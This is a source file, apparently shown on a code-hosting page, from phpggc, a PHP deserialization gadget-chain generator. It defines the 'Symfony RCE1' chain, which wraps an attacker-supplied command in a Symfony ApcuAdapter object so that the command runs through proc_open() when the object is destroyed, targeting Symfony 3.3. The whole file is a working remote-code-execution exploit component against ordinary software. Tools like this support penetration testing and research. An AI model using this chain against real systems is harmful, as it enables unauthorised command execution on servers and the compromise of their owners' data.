Codebase list phpggc / run/c6d1b617-dd14-4f02-8915-b8cb306ac4eb/main gadgetchains / Symfony / RCE / 1 / chain.php
run/c6d1b617-dd14-4f02-8915-b8cb306ac4eb/main

Tree @run/c6d1b617-dd14-4f02-8915-b8cb306ac4eb/main (Download .tar.gz)

chain.php @run/c6d1b617-dd14-4f02-8915-b8cb306ac4eb/mainraw · history · blame

<?php

namespace GadgetChain\Symfony;

class RCE1 extends \PHPGGC\GadgetChain\RCE\Command
{
    public static $version = '3.3';
    public static $vector = '__destruct';
    public static $author = 'cf';
    public static $information = 'Executes given command through proc_open()';

    public function generate(array $parameters)
    {
        $command = $parameters['command'];

        return new \Symfony\Component\Cache\Adapter\ApcuAdapter(
        	$command
        );
    }
}